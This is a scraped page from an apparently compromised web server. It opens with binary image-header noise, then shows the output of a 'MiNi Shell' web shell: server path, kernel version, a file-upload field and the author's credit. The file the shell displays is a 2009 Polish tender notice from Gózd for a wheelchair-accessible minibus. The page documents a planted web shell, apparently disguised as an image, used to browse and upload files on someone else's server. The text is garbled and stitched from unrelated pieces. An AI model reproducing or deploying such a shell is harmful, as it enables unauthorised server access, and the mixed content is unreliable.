JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090107/5903-N-2009.html

<p class="kh_header"><b>Gózd: Dostawa mikrobusa 9 miejscowego przystosowanego do przewozu osób niepełnosprawnych</b><br>
<b>Numer ogłoszenia: 5903 - 2009; data zamieszczenia: 07.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Ekonomiczno Administracyjny Szkół , ul. Radomska 7, 26-634 Gózd, woj. mazowieckie, tel. 048 3202357, faks 048 3202357.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gozd.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mikrobusa 9 miejscowego przystosowanego do przewozu osób niepełnosprawnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa fabrycznie nowego , wyprodukowanego w 2008 roku lub 2009 roku, 9-osobowego samochodu przystosowanego do przewozu osób niepełnosprawnych, w tym 1 osoby na wózku inwalidzkim. Pojazd  powinien  posiadać  roczne ubezpieczenie OC, AC, NW, oraz  zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzające, że dokonane przystosowanie do przewozu osób niepełnosprawnych na wózku inwalidzkim odpowiada określonym normom i specyfikacjom lub oświadczenie wykonawcy w tej kwestii . Homologacja samochodu z możliwością przewozu osób niepełnosprawnych .
Wymogi techniczne i wyposażenie minimalne przedmiotu zamówienia :
rok produkcji - 2008 lub 2009 fabrycznie nowy,
silnik wysokoprężny (diesel) z turbo doładowaniem o mocy minimum 85 KM,
całkowita długość pojazdu - nie więcej niż 5 500 mm,
nadwozie standardowe, bez nadstawek,
skrzynia biegów manualna, min. 5 biegów do przodu + bieg wsteczny,
lusterko wsteczne wewnętrzne, chroniące przed oślepieniem,
system stabilizacji toru jazdy ESP,
system przeciwdziałający poślizgowi kół napędzanych podczas ruszania  EDS,
system zapobiegający blokowaniu kół podczas hamowania ABS,
wspomaganie układu kierowniczego,
kolumna kierownicy regulowana w dwóch płaszczyznach,
reflektory przednie ksenony z regulacją zasięgu,
światła przeciwmgielne z przodu i z tyłu
bezwładnościowe trójpunktowe pasy bezpieczeństwa,
klimatyzacja z rozprowadzeniem powietrza na przód i tył,
ogrzewanie postojowe o zużyciu paliwa w przedziale  1 - 2,5 L na 1 godz.,
dmuchawa powietrza cichobieżna z dyszami układu ogrzewania na szybę przednią i boczne,
kabina kierowcy: regulowany fotel kierowcy + siedzenie dwuosobowe dla pasażera,
poduszka powietrzna dla kierowcy i pasażera,
radioodtwarzacz CD, instalacja radiowa, wbudowane głośniki,
dywaniki w przedziale kierowcy,
gniazdo 12 V w kabinie kierowcy,
drzwi boczne z prawej strony, przesuwane do tyłu, przeszklone, umożliwiające łatwe wejście do przedziału pasażerskiego,
uchwyt umożliwiający wejście do przedziału pasażerskiego na całej wielkości drzwi po prawej stronie,
oświetlenie stopnia  bocznego - wejściowego,
drzwi tylne dwuskrzydłowe przeszklone z wycieraczką i spryskiwaczem, wyposażone w ograniczniki  i blokadę położenia skrzydeł,
tylna szyba ogrzewana,
przedział pasażerski : pełne przeszklenie, szyby przyciemniane, z atestem,
oświetlenie przedziału pasażerskiego,
tapicerka siedzeń w przedziale pasażerskim wykonana z materiału łatwo zmywalnego, odpornego na ścieranie,
demontowany ostatni rząd foteli,
zamek centralny z pilotem,
system przeciw uruchomieniowy,
alarm zabezpieczający przed kradzieżą,
kolor nadwozia granatowy,
koło zapasowe pełnowymiarowe,
komplet opon letnich wraz z felgami,
komplet opon zimowych wraz z felgami,
system zapobiegający poślizgowi kół napędzanych poprzez zmniejszenie przekazywanego
W czasie jazdy przez silnik zbyt dużego momentu obrotowego ASR
tapicerka siedzeń kolor popiel 
okres gwarancji minimum 24 miesiące od daty podpisania protokołu odbioru na podzespoły mechaniczne i wyposażenie,
okres gwarancji na perforację nadwozia minimum 120 miesięcy,
ubezpieczenie w zakresie  AC, OC, NW na min. 12 miesięcy.

Przystosowanie do przewozu osób niepełnosprawnych na wózkach inwalidzkich:

podłoga o powierzchni przeciwpoślizgowej, łatwo zmywalnej, połączonej szczelnie z zabudową ścian,
podłogowe szyny montażowe przystosowane do mocowania jednego wózka inwalidzkiego,
miejsce do montażu wózka inwalidzkiego,
winda na wózek inwalidzki 
komplet pasów zabezpieczających wózek osoby niepełnosprawnej,
pas biodrowy zabezpieczający osobę niepełnosprawną na wózku inwalidzkim,
oznakowanie pojazdu z przodu i z tyłu symbolem   - inwalidzi - zgodne z przepisami..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.11.52.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie 2000,oo PLN  słownie: dwa tysiące zł  .<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają wymagania określone w ustawie i w niniejszej SIWZ oraz następujące warunki 
1Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
-Poprzez posiadanie uprawnień do wykonywania określonej działalności lub czynności Zamawiający rozumie wpis przedsiębiorcy do właściwego rejestru lub ewidencji działalności  gospodarczej.
2Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
- Poprzez posiadanie niezbędnego doświadczenia Zamawiający rozumie wykonanie  dostaw ( co najmniej 1 ), w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie   zamówienia , a jeżeli  okres prowadzenia działalności  jest krótszy - w tym okresie ,odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia z podaniem ich wartości , dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających , ze dostawy te zostały wykonane należycie , tj. dostawy  9-osobowego samochodu przystosowanego do przewozu osób niepełnosprawnych, w tym na wózku inwalidzkim.
3Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4Nie podlegają wykluczeniu z postępowania na podstawie art. 24  ustawy  Prawo zamówień publicznych .
-W celu potwierdzenia, że Wykonawca nie podlega wykluczeniu Zamawiający wymaga niezalegania  Wykonawcy z opłacaniem podatków opłat oraz składek na ubezpieczenie zdrowotne lub społeczne , lub uzyskania zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu .
Ocena spełniania warunków wymaganych od wykonawców prowadzona będzie na podstawie analizy oświadczeń  i dokumentów, o których mowa w punkcie  XVIII  SIWZ metodą  spełnia/niespełnia, z uwzględnieniem przepisu art.26 ust.3 ustawy Prawo zamówień publicznych . Z treści załączonych  dokumentów musi wynikać jednoznacznie, iż wykonawca spełnia ww warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1Wypełniony formularz oferty  na druku, którego wzór został dołączony do  materiałach przetargowych 
2Oświadczenie o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 i nie podleganiu wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy Prawo zamówień publicznych  na druku, którego wzór został dołączony do materiałów przetargowych  w formie załącznika Nr 1 
3Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert w formie załącznik Nr 2 
4Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, ze wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia , ze uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert  w formie załącznik Nr 3 i 4  
5Zaparafowany przez Wykonawcę wzór projektu umowy na realizację zamówienia ,  który został dołączony do materiałów przetargowych  w formie załącznik Nr 5
6.Wykaz wykonanych  dostaw ( co najmniej 1 ), w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie   zamówienia , a jeżeli  okres prowadzenia działalności  jest krótszy w tym okresie , odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia 
z podaniem ich wartości , dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających że dostawy te zostały wykonane należycie  tj. dostawy  9 osobowego samochodu przystosowanego do przewozu osób niepełnosprawnych, w tym na wózku inwalidzkich w formie załącznik Nr 6
Za należycie wykonaną Zamawiający uzna dostawę zrealizowaną terminowo, zgodnie z warunkami wynikającymi  z zawartej umowy.
7Folder informacyjny ze zdjęciami zawierający opis techniczny  oferowanego samochodu w formie załącznik Nr 7
Inne dokumenty składane wraz z ofertą
1Pełnomocnictwo w formie oryginału lub kopii poświadczonej notarialnie w sytuacji, gdy wykonawca składa ofertę przez ustanowionego pełnomocnika  w formie załącznik Nr 8
2W przypadku podmiotów występujących wspólnie pełnomocnictwo, o którym mowa w art.23 ust.2 ustawy  Pzp w formie załącznik Nr 9
3Potwierdzenie wpłaty wadium  w przypadku wadium wnoszonego w pieniądzu bądź w przypadku wadium wnoszonego w innej formie odpowiedni dokument w formie załącznik Nr 10.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.gozd.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Gózd - Zespół Ekonomiczno Administracyjny Szkół w Goździe,  ul. Radomska 7 pokój nr 102 -  I piętro  26-634 Gózd, w godzinach pracy Gminy i  ZEAS..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2009 godzina 10:50, miejsce: Gmina Gózd -Zespół Ekonomiczno Administracyjny Szkół w Goździe, ul. Radomska 7, pok. nr 102  I piętro..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com